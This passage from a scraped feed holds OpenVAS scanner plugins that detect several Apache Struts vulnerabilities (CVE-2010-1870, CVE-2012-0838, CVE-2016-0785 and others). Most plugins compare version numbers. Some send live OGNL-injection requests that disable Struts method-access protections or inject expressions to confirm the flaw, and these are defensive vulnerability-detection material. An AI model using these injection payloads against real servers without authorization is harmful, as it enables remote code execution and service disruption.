Remote Command Execution Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801441\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Struts Remote Command Execution Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name:\"URL\", value:\"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in 'OGNL' extensive expression evaluation\n capability in XWork in Struts, uses as permissive whitelist, which allows\n remote attackers to modify server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various variables.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts version 2.2 or later\");\n\n script_tag(name:\"summary\", value:\"This host is running Struts and is prone to remote command\n execution vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to manipulate server-side context\n objects with the privileges of the user running the application.\");\n script_tag(name:\"affected\", value:\"Struts version 2.0.0 through 2.1.8.1\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) ) exit( 0 );\nver = infos['version'];\ndir = infos['location'];\n\nif( version_in_range( version:ver, test_version:\"2.0\", test_version2:\"2.1.8.1\" ) ) {\n report = report_fixed_ver( installed_version:ver, fixed_version:\"2.2\", install_path:dir );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-02T21:09:49", "description": "This host is running Struts and is prone to\n remote command execution vulnerability.", "cvss3": {}, "published": "2010-12-21T00:00:00", "type": "openvas", "title": "Apache Struts2/XWork Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2017-02-10T00:00:00", "id": "OPENVAS:801663", "href": "http://plugins.openvas.org/nasl.php?oid=801663", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_xwork_cmd_exec_vuln.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Apache Struts2/XWork Remote Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(801663);\n script_version(\"$Revision: 5263 $\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-21 15:42:46 +0100 (Tue, 21 Dec 2010)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_name(\"Apache Struts2/XWork Remote Command Execution Vulnerability\");\n\n script_tag(name: \"summary\" , value:\"This host is running Struts and is prone to\n remote command execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted data via HTTP POST request\n and check whether it is is able to execute remote code or not.\");\n\n script_tag(name: \"insight\" , value:\"The flaw is due to an error in 'OGNL' extensive\n expression evaluation capability in XWork in Struts, uses as permissive whitelist,\n which allows remote attackers to modify server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various varibles.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow attackers to\n manipulate server-side context objects with the privileges of the user running the application.\n\n Impact Level: Application.\");\n\n script_tag(name: \"affected\" , value:\"Struts version 2.0.0 through 2.1.8.1\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Struts version 2.2 or later\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name : \"URL\" , value : \"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Get HTTP Port\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\n## OGNL (Object Graph Navigation Language)\nognl=\"?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\"+\n \"\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023\" +\n \"foo')(\\u0023foo\\u003dnew%20java.lang.Boolean('false')))&(asdf)(('\\u0023\" +\n \"rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()))=1\";\n\n## Send and Receive the response\nreq = http_get(item:string(dir,\"example/HelloWorld.action\"), port:asport);\nres = http_keepalive_send_recv(port:asport, data:req);\n\n## Confirm the application\nif(\"<title>Struts\" >< res)\n{\n ## Construct attack request\n url = string(dir,\"example/HelloWorld.action\",ognl);\n\n ## Try attack and check the response to confirm vulnerability\n if(http_vuln_check(port:port, url:url,\n pattern:'<a href=\".*xwork.MethodAccessor.denyMethodExecution',\n check_header: TRUE))\n {\n security_message(asport);\n exit(0);\n }\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:00", "description": "This host is running Struts and is prone to remote command\n execution vulnerability.", "cvss3": {}, "published": "2010-09-10T00:00:00", "type": "openvas", "title": "Struts Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2017-02-10T00:00:00", "id": "OPENVAS:801441", "href": "http://plugins.openvas.org/nasl.php?oid=801441", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_remote_cmd_exec_vuln.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Struts Remote Command Execution Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to manipulate server-side context\n objects with the privileges of the user running the application.\n Impact Level: Application.\";\ntag_affected = \"Struts version 2.0.0 through 2.1.8.1\";\n\ntag_insight = \"The flaw is due to an error in 'OGNL' extensive expression evaluation\n capability in XWork in Struts, uses as permissive whitelist, which allows\n remote attackers to modify server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various varibles.\";\ntag_solution = \"Upgrade to Struts version 2.2 or later\n For updates refer to http://struts.apache.org/download.cgi\";\ntag_summary = \"This host is running Struts and is prone to remote command\n execution vulnerability.\";\n\nif(description)\n{\n script_id(801441);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Struts Remote Command Execution Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name : \"URL\" , value : \"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n exit(0);\n}\n\t\t\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\n## Get HTTP Port\nstPort = get_http_port(default:8080);\nif(!get_port_state(stPort)){\n exit(0);\n}\n\n## GET the version from KB\nstVer = get_kb_item(\"www/\" + stPort + \"/Apache/Struts\");\nstVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:stVer);\n\n## Check for the Struts version\nif(stVer[1] != NULL)\n{\n if(version_in_range(version:stVer[1], test_version:\"2.0\", test_version2:\"2.1.8.1\")){\n security_message(stPort);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:15", "description": "This host is running Apache Struts and is\n prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-06-07T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution vulnerability June16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785"], "modified": "2018-11-21T00:00:00", "id": "OPENVAS:1361412562310808067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808067", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_remote_code_exec_vuln_june.nasl 58255 2016-06-07 13:59:43 +0530 June$\n#\n# Apache Struts Remote Code Execution vulnerability June16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808067\");\n script_version(\"$Revision: 12455 $\");\n script_cve_id(\"CVE-2016-0785\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 10:17:27 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-07 13:59:43 +0530 (Tue, 07 Jun 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Remote Code Execution vulnerability June16\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an improper validation\n of a non-spec URL-encoded parameter value including multi-byte characters.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x through 2.3.24.1\n (except 2.3.20.3)\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.20.3\n or 2.3.24.3 or 2.3.28 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-029.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n##version 2.3.20.3 is not vulnerable\nif(version_is_equal(version:appVer, test_version:\"2.3.20.3\")){\n exit(0);\n}\n\n## Vulnerable version according to Advisory\nelse if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24.1\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.20.3 or 2.3.24.3 or 2.3.28\");\n security_message(data:report, port:appPort);\n exit(0);\n}\n\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0838"], "description": "This host is running Apache Struts Showcase\n and is prone to java method execution vulnerability.", "modified": "2019-02-14T00:00:00", "published": "2012-03-13T00:00:00", "id": "OPENVAS:1361412562310802425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802425", "type": "openvas", "title": "Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_showcase_java_method_exec_vuln.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802425\");\n script_version(\"$Revision: 13659 $\");\n script_cve_id(\"CVE-2012-0838\");\n script_bugtraq_id(49728);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-13 14:59:53 +0530 (Tue, 13 Mar 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts Showcase\n and is prone to java method execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and\n check whether it is able execute java methods or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper conversion\n in OGNL expression if a non string property is contained in action.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary java\n method. Further that results to disclose environment variables or cause a\n denial of service or an arbitrary OS command can be executed.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts2 (Showcase) version 2.x to 2.2.3\");\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts2 2.2.3.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN79099262/index.html\");\n script_xref(name:\"URL\", value:\"https://issues.apache.org/jira/browse/WW-3668\");\n script_xref(name:\"URL\", value:\"http://jvndb.jvn.jp/en/contents/2012/JVNDB-2012-000012.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:asport);\n\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\nif(!asres) exit(0);\n\nif(\">Showcase</\" >< asres && \">Struts Showcase<\" >< asres) {\n\n postdata = \"requiredValidatorField=&requiredStringValidatorField\" +\n \"=&integerValidatorField=%22%3C%27+%2B+%23application\" +\n \"+%2B+%27%3E%22&dateValidatorField=&emailValidatorFie\" +\n \"ld=&urlValidatorField=&stringLengthValidatorField=&r\" +\n \"egexValidatorField=&fieldExpressionValidatorField=\";\n\n url = dir + \"/validation/submitFieldValidatorsExamples.action\";\n\n asReq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if( asRes && \".template.Configuration@\" >< asRes && \">Struts Showcase<\" >< asRes ) {\n security_message(port:asport);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0838"], "description": "This host is running Apache Struts Showcase\n and is prone to java method execution vulnerability.", "modified": "2017-04-03T00:00:00", "published": "2012-03-13T00:00:00", "id": "OPENVAS:802425", "href": "http://plugins.openvas.org/nasl.php?oid=802425", "type": "openvas", "title": "Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_showcase_java_method_exec_vuln.nasl 5841 2017-04-03 12:46:41Z cfi $\n#\n# Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(802425);\n script_version(\"$Revision: 5841 $\");\n script_cve_id(\"CVE-2012-0838\");\n script_bugtraq_id(49728);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-03 14:46:41 +0200 (Mon, 03 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-13 14:59:53 +0530 (Tue, 13 Mar 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts Showcase\n and is prone to java method execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted HTTP GET request and\n check whether it is able execute java methods or not.\");\n\n script_tag(name: \"insight\" , value:\"The flaw is due to an improper conversion\n in OGNL expression if a non string property is contained in action.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation could allow an attacker to execute arbitrary java\n method. Further that results to disclose environment variables or cause a\n denial of service or an arbitrary OS command can be executed.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts2 (Showcase) version 2.x to 2.2.3\");\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts2 2.2.3.1 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://jvn.jp/en/jp/JVN79099262/index.html\");\n script_xref(name : \"URL\" , value : \"https://issues.apache.org/jira/browse/WW-3668\");\n script_xref(name : \"URL\" , value : \"http://jvndb.jvn.jp/en/contents/2012/JVNDB-2012-000012.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nasport = 0;\nasreq = \"\";\nasres = \"\";\nasRes = \"\";\nasReq = \"\";\ndir = \"\";\nurl = \"\";\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nif(asreq)\n{\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(asres)\n {\n ## Confirm the application\n if(\">Showcase</\" >< asres && \">Struts Showcase<\" >< asres)\n {\n ## Construct the POST data\n postdata = \"requiredValidatorField=&requiredStringValidatorField\" +\n \"=&integerValidatorField=%22%3C%27+%2B+%23application\" +\n \"+%2B+%27%3E%22&dateValidatorField=&emailValidatorFie\" +\n \"ld=&urlValidatorField=&stringLengthValidatorField=&r\" +\n \"egexValidatorField=&fieldExpressionValidatorField=\";\n\n url = dir + \"/validation/submitFieldValidatorsExamples.action\";\n\n ## Construct the POST request\n asReq = string(\"POST \", url,\" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes)\n {\n ## Confirm the exploit\n if(!isnull(asRes) &&(\".template.Configuration@\" >< asRes) &&\n \">Struts Showcase<\" >< asRes)\n {\n security_message(asRes);\n exit(0);\n }\n }\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-15T13:08:51", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-01-11T00:00:00", "id": "OPENVAS:803838", "href": "http://plugins.openvas.org/nasl.php?oid=803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803838);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61196, 61189);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-24 11:58:54 +0530 (Wed, 24 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Redirection and Security Bypass Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send an expression along with the redirect command\n via HTTP GET request and check whether it is redirecting and solve the expression or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaws are due to improper sanitation of 'action:',\n 'redirect:', and 'redirectAction:' prefixing parameters before being used in\n DefaultActionMapper.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attacker\n to execute arbitrary arbitrary Java code via OGNL (Object-Graph Navigation Language)\n or redirect user to a malicious url.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 